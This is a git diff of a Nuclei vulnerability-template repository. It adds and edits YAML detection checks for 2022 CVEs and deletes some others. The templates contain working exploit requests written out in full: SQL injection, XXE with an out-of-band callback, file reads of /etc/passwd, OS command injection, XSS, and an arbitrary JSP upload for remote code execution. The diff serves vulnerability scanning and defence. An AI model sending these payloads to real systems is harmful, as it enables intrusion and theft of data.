College Management System 1.0 contains a SQL injection vulnerability via the course code parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. + reference: + - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated + - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f + - https://nvd.nist.gov/vuln/detail/CVE-2022-28079 + - https://code-projects.org/college-management-system-in-php-with-source-code/ + - https://www.nu11secur1ty.com/2022/05/cve-2022-28079.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-28079 + cwe-id: CWE-89 + epss-score: 0.80212 + epss-percentile: 0.98029 + cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: college_management_system_project + product: college_management_system + tags: cve,cve2022,sqli,cms,collegemanagement,college_management_system_project +variables: + num: "999999999" + +http: + - raw: + - | + POST /admin/asign-single-student-subjects.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL# + + matchers-condition: and + matchers: + - type: word + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 302 +# digest: 4b0a00483046022100ad3280dd169fc265e15a1fb1734bb88fbfe21000ca36ebab37d25784e71c6416022100a02f6644e9b1a7fd03fc3523742435de169ba87b7c110db223a9010dad57fa2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-28080.yaml b/nuclei-templates/CVE-2022/cve-2022-28080.yaml index 021d8a2b18..9076309976 100644 --- a/nuclei-templates/CVE-2022/cve-2022-28080.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-28080.yaml @@ -6,18 +6,31 @@ info: severity: high description: | Royal Event is vulnerable to a SQL injection vulnerability. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire database. + remediation: | + To remediate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks. reference: - https://www.exploit-db.com/exploits/50934 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 + - https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28080 - tags: royalevent,edb,cve,cve2022,sqli,authenticated,cms + cwe-id: CWE-89 + epss-score: 0.01461 + epss-percentile: 0.86424 + cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: event_management_system_project + product: event_management_system + tags: cve,cve2022,royalevent,edb,sqli,authenticated,cms,intrusive,event_management_system_project -requests: +http: - raw: - | POST /royal_event/ HTTP/1.1 @@ -38,7 +51,6 @@ requests: ------WebKitFormBoundaryCSxQll1eihcqgIgD-- - - | POST /royal_event/btndates_report.php HTTP/1.1 Host: {{Hostname}} @@ -58,7 +70,6 @@ requests: 01/01/2011 ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -68,5 +79,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/15 +# digest: 490a0046304402206f49180b6302f9fef0412af1682487a99e8e841803be35372ea552f7878da30e022034287c08d99ef3e984b6ba91845fc4b18462d620c01f5ea9326718da215d237f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-28219.yaml b/nuclei-templates/CVE-2022/cve-2022-28219.yaml new file mode 100644 index 0000000000..1d27898b64 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-28219.yaml @@ -0,0 +1,67 @@ +id: CVE-2022-28219 + +info: + name: Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution + author: dwisiswant0 + severity: critical + description: | + Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an + unauthenticated XML entity injection attack that can lead to remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code or perform remote code execution on the affected system. + remediation: | + Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus + is configured with a dedicated service account with restricted privileges. + reference: + - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html + - https://www.horizon3.ai/red-team-blog-cve-2022-28219/ + - https://manageengine.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-28219 + - http://cewolf.sourceforge.net/new/index.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-28219 + cwe-id: CWE-611 + epss-score: 0.97392 + epss-percentile: 0.99909 + cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: zohocorp + product: manageengine_adaudit_plus + shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" + tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth,zohocorp + +http: + - method: POST + path: + - "{{BaseURL}}/api/agent/tabs/agentData" + + body: | + [ + { + "DomainName": "{{Host}}", + "EventCode": 4688, + "EventType": 0, + "TimeGenerated": 0, + "Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><! foo [ <!ENTITY % xxe SYSTEM \"http://{{interactsh-url}}\"> %xxe; ]>" + } + ] + + headers: + Content-Type: application/json + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: word + part: body + words: + - "ManageEngine" +# digest: 4b0a00483046022100adfe043ed717eb4c2bd34e54d594afa7fcd27ffa6a5abaa6d34ae8fe396dcd53022100ad5db93b3daf8c1043b3d88354716768831713fd53728c5fe7d83373dbdca6b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-28363.yaml b/nuclei-templates/CVE-2022/cve-2022-28363.yaml index 163b9040a3..c610bcd0dc 100644 --- a/nuclei-templates/CVE-2022/cve-2022-28363.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-28363.yaml @@ -1,31 +1,42 @@ id: CVE-2022-28363 info: - name: Reprise License Manager 14.2 - Reflected Cross-Site Scripting + name: Reprise License Manager 14.2 - Cross-Site Scripting author: Akincibor severity: medium description: | - Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required. + Reprise License Manager 14.2 contains a reflected cross-site scripting vulnerability in the /goform/login_process 'username' parameter via GET, whereby no authentication is required. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to a patched version of Reprise License Manager or apply the vendor-supplied patch to mitigate this vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-28363 - https://www.reprisesoftware.com/products/software-license-management.php - https://github.com/advisories/GHSA-rpvc-qgrm-r54f - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-28363 + - https://github.com/ARPSyndicate/kenzer-templates classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2022-28363 - tags: cve,cve2022,xss,rlm + cwe-id: CWE-79 + epss-score: 0.00237 + epss-percentile: 0.61062 + cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: reprisesoftware + product: reprise_license_manager + tags: cve,cve2022,xss,rlm,packetstorm,reprisesoftware -requests: +http: - method: GET path: - "{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -37,3 +48,8 @@ requests: part: header words: - "text/html" + + - type: status + status: + - 200 +# digest: 4b0a0048304602210083399ab30c18aa4ee9e8a8dc77c6a1dc50feb2092036ee0a9fea49eba0c770a4022100aba47004ae87a814261cb712697ce39cb06ac5da29c432abb75c5ec9fac9738c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-28365.yaml b/nuclei-templates/CVE-2022/cve-2022-28365.yaml index 051032c3f3..36bde738a1 100644 --- a/nuclei-templates/CVE-2022/cve-2022-28365.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-28365.yaml @@ -6,29 +6,37 @@ info: severity: medium description: | Reprise License Manager 14.2 is susceptible to information disclosure via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. An attacker can possibly obtain further sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of Reprise License Manager. reference: - https://www.reprisesoftware.com/products/software-license-management.php - https://github.com/advisories/GHSA-4g2v-6x25-vr7p - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html - https://nvd.nist.gov/vuln/detail/CVE-2022-28365 + - https://www.reprisesoftware.com/RELEASE_NOTES classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-28365 - cwe-id: CWE-668 - tags: rlm,packetstorm,cve,cve2022,exposure + cwe-id: CWE-425 + epss-score: 0.00689 + epss-percentile: 0.77964 + cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: reprisesoftware + product: reprise_license_manager + tags: cve,cve2022,rlm,packetstorm,exposure,reprisesoftware -requests: +http: - method: GET path: - "{{BaseURL}}/goforms/rlminfo" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -36,4 +44,7 @@ requests: - "Platform type" condition: and -# Enhanced by md on 2023/02/03 + - type: status + status: + - 200 +# digest: 4a0a004730450221009238cd94d4ea391e4ba3a8fd9b6b9e4d2b1b35ea6b4618985cbd7679ba6c26aa022046b75d3e44aef88da8a1c3a43d4d2f499141f72031f265049c0993976f2531de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-29014.yaml b/nuclei-templates/CVE-2022/cve-2022-29014.yaml new file mode 100644 index 0000000000..6fd1794a52 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-29014.yaml @@ -0,0 +1,49 @@ +id: CVE-2022-29014 + +info: + name: Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion + author: edoardottt + severity: high + description: Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system. + remediation: | + Apply the latest firmware update provided by Razer to fix the Local File Inclusion vulnerability. + reference: + - https://www.exploit-db.com/exploits/50864 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29014 + - https://www2.razer.com/ap-en/desktops-and-networking/razer-sila + - https://packetstormsecurity.com/files/166683/Razer-Sila-2.0.418-Local-File-Inclusion.html + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-29014 + epss-score: 0.77285 + epss-percentile: 0.98135 + cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: razer + product: sila_firmware + tags: cve,cve2022,edb,packetstorm,razer,lfi,router + +http: + - raw: + - | + POST /ubus/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + {"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]} + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100fa422597b17ed8103daea7b9b7c129502f25b691034e1c73b5e6f98089537455022042b8117c0c1f7a96f5dfed6a5cc2244e045d23ecfb50bd7a34715f8bf79b1d20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-29299.yaml b/nuclei-templates/CVE-2022/cve-2022-29299.yaml index cacf113fb8..d334a36759 100644 --- a/nuclei-templates/CVE-2022/cve-2022-29299.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-29299.yaml @@ -6,17 +6,26 @@ info: severity: medium description: | SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://www.exploit-db.com/exploits/50967 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29299 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cve-id: CVE-2022-29299 + epss-score: 0.00175 + epss-percentile: 0.53704 metadata: verified: true + max-request: 1 shodan-query: http.favicon.hash:-244067125 - tags: cve,cve2022,xss,solarview,edb + tags: cve2022,cve,xss,solarview,edb -requests: +http: - method: GET path: - '{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6' @@ -38,5 +47,4 @@ requests: - type: status status: - 200 - -# Enhanced by cs 06/21/2022 +# digest: 4a0a004730450220673dc09a9e66945d3637df5b363f262144bea056b46b6df86841bfd376ae1c290221008cbc66ea88991d111c727cdec2f06797a521103da95bc92272406df8e87890a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-29301.yaml b/nuclei-templates/CVE-2022/cve-2022-29301.yaml new file mode 100644 index 0000000000..9841826381 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-29301.yaml @@ -0,0 +1,48 @@ +id: CVE-2022-29301 + +info: + name: SolarView Compact 6.00 - 'pow' Cross-Site Scripting + author: For3stCo1d + severity: high + description: | + SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'pow' parameter to Solar_SlideSub.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest patch or upgrade to a non-vulnerable version of SolarView Compact. + reference: + - https://www.exploit-db.com/exploits/50968 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29301 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cve-id: CVE-2022-29301 + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-244067125 + tags: cve,cve2022,xss,solarview,edb + +http: + - method: GET + path: + - '{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<script>alert(document.domain)</script><"">' + - 'SolarView' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100d38ffbd6542c292bb1f0cc27a0f800b5723872c60c562f22a60f1da6b998c8d5022100a20ec0c2ea61b699dd97b70ca196faf415a635099331772a14498dcbac2b3839:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-29303.yaml b/nuclei-templates/CVE-2022/cve-2022-29303.yaml new file mode 100644 index 0000000000..3f9b0f07ff --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-29303.yaml @@ -0,0 +1,58 @@ +id: CVE-2022-29303 + +info: + name: SolarView Compact 6.00 - OS Command Injection + author: badboycxcc + severity: critical + description: | + SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system. + remediation: | + Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00. + reference: + - https://www.exploit-db.com/exploits/50940 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303 + - https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing + - http://packetstormsecurity.com/files/167183/SolarView-Compact-6.0-Command-Injection.html + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-29303 + cwe-id: CWE-78 + epss-score: 0.9598 + epss-percentile: 0.99429 + cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: contec + product: sv-cpt-mc310_firmware + shodan-query: http.html:"SolarView Compact" + tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec +variables: + cmd: "cat${IFS}/etc/passwd" + +http: + - raw: + - | + @timeout: 25s + POST /conf_mail.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0" + + - type: word + part: body + words: + - "p1_network_mail.cgi" +# digest: 4a0a00473045022100cfdae160b8d20debb49ab77a03efc5984e3595e0738b0153de27449eb8cf254c022008bf10a1ac0f9b524841d022daae36b4b0b105ddae1296e300fb87c886200617:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-29383.yaml b/nuclei-templates/CVE-2022/cve-2022-29383.yaml deleted file mode 100644 index c0522654b9..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-29383.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2022-29383 - -info: - name: NETGEAR ProSafe SSL VPN firmware - SQL Injection - author: elitebaz - severity: critical - description: | - NETGEAR ProSafe SSL VPN multiple firmware versions were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi. - reference: - - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383 - - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383 - - https://nvd.nist.gov/vuln/detail/CVE-2022-29383 - - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-29383 - metadata: - verified: "true" - tags: cve,cve2022,sqli,netgear,router - -requests: - - raw: - - | - POST /scgi-bin/platform.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=utf-8 - - thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd - - - | - POST /scgi-bin/platform.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=utf-8 - - thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd - - req-condition: true - matchers: - - type: dsl - dsl: - - contains(body_1, "User authentication Failed") - - contains(body_2, "User Login Failed for SSLVPN User.") - condition: and - -# Enhanced by mp on 2022/07/04 diff --git a/nuclei-templates/CVE-2022/cve-2022-29455.yaml b/nuclei-templates/CVE-2022/cve-2022-29455.yaml deleted file mode 100644 index d46b7b79d9..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-29455.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: CVE-2022-29455 - -info: - name: WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting - author: rotembar,daffainfo - severity: medium - description: | - WordPress Elementor Website Builder plugin 3.5.5 and prior contains a reflected cross-site scripting vulnerability via the document object model. - reference: - - https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor - - https://www.rotem-bar.com/elementor - - https://patchstack.com/database/vulnerability/elementor/wordpress-elementor-plugin-3-5-5-unauthenticated-dom-based-reflected-cross-site-scripting-xss-vulnerability - - https://nvd.nist.gov/vuln/detail/CVE-2022-29455 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-29455 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2022,xss,wordpress,elementor - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/elementor/readme.txt' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Elementor Website Builder' - - - type: dsl - dsl: - - compare_versions(version, '<= 3.5.5') - - - type: status - status: - - 200 - - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - - - type: regex - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-29464.yaml b/nuclei-templates/CVE-2022/cve-2022-29464.yaml deleted file mode 100644 index c82331a780..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-29464.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2022-29464 - -info: - name: WSO2 Management - Arbitrary File Upload & Remote Code Execution - author: luci,dhiyaneshDk - severity: critical - description: | - Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0. - reference: - - https://shanesec.github.io/2022/04/21/Wso2-Vul-Analysis-cve-2022-29464/ - - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738 - - https://github.com/hakivvi/CVE-2022-29464 - - https://nvd.nist.gov/vuln/detail/CVE-2022-29464 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-29464 - cwe-id: CWE-434 - metadata: - shodan-query: http.favicon.hash:1398055326 - tags: cve,cve2022,rce,fileupload,wso2,intrusive,kev - -requests: - - raw: - - | - POST /fileupload/toolsAny HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311 - Content-Length: 348 - - -----------------------------250033711231076532771336998311 - Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower("{{randstr}}")}}.jsp";filename="test.jsp" - Content-Type: application/octet-stream - - <% out.print("WSO2-RCE-CVE-2022-29464"); %> - -----------------------------250033711231076532771336998311-- - - - | - GET /authenticationendpoint/{{to_lower("{{randstr}}")}}.jsp HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - matchers: - - type: dsl - dsl: - - "contains(body_2, 'WSO2-RCE-CVE-2022-29464')" - -# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2022/cve-2022-30776.yaml b/nuclei-templates/CVE-2022/cve-2022-30776.yaml index ee863c1351..f912a8432c 100644 --- a/nuclei-templates/CVE-2022/cve-2022-30776.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-30776.yaml @@ -6,22 +6,33 @@ info: severity: medium description: | Atmail 6.5.0 contains a cross-site scripting vulnerability via the index.php/admin/index/ 'error' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or upgrade to a newer version of Atmail that addresses this vulnerability. reference: - https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9 - https://www.atmail.com/ - https://help.atmail.com/hc/en-us/sections/115003283988 - https://nvd.nist.gov/vuln/detail/CVE-2022-30776 + - https://medium.com/%40bhattronit96/cve-2022-30776-cd34f977c2b9 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30776 cwe-id: CWE-79 + epss-score: 0.00112 + epss-percentile: 0.43631 + cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: atmail + product: atmail shodan-query: http.html:"atmail" - verified: "true" - tags: cve,cve2022,atmail,xss + tags: cve2022,cve,atmail,xss -requests: +http: - method: GET path: - "{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -41,5 +52,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 4a0a0047304502210098e7e92637618d4c3c5540938565842f9d2479c1b7a7ca9a9333b2e0bf64a29b022077e0d1d54bd671842a9ba69fdbad1ed67e8c6f085c3235fde69b2d9e18009833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-30777.yaml b/nuclei-templates/CVE-2022/cve-2022-30777.yaml new file mode 100644 index 0000000000..d36995911c --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-30777.yaml @@ -0,0 +1,56 @@ +id: CVE-2022-30777 + +info: + name: Parallels H-Sphere 3.6.1713 - Cross-Site Scripting + author: 3th1c_yuk1 + severity: medium + description: | + Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patch or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. + reference: + - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59 + - https://en.wikipedia.org/wiki/H-Sphere + - https://nvd.nist.gov/vuln/detail/CVE-2022-30777 + - https://medium.com/%40bhattronit96/cve-2022-30777-45725763ab59 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-30777 + cwe-id: CWE-79 + epss-score: 0.00087 + epss-percentile: 0.36061 + cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: parallels + product: h-sphere + shodan-query: title:"h-sphere" + tags: cve,cve2022,parallels,hsphere,xss + +http: + - method: GET + path: + - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + words: + - '<TITLE>"><script>alert(document.domain)</script>' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a004730450220193f90816efc79d2ac468c37e58a42add449c9c53f48ed07934c74f756d9550d022100bc87714095325fe51d81827336aa365718a61f67c95e590fea50198ba245e3eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-31268.yaml b/nuclei-templates/CVE-2022/cve-2022-31268.yaml new file mode 100644 index 0000000000..061d0ca131 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-31268.yaml @@ -0,0 +1,58 @@ +id: CVE-2022-31268 + +info: + name: Gitblit 1.9.3 - Local File Inclusion + author: 0x_Akoko + severity: high + description: | + Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname). + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system. + remediation: | + Upgrade Gitblit to a version that is not affected by the vulnerability (CVE-2022-31268). + reference: + - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md + - https://vuldb.com/?id.200500 + - https://nvd.nist.gov/vuln/detail/CVE-2022-31268 + - https://github.com/Marcuccio/kevin + - https://github.com/20142995/sectool + classification: + cvss-metrics: 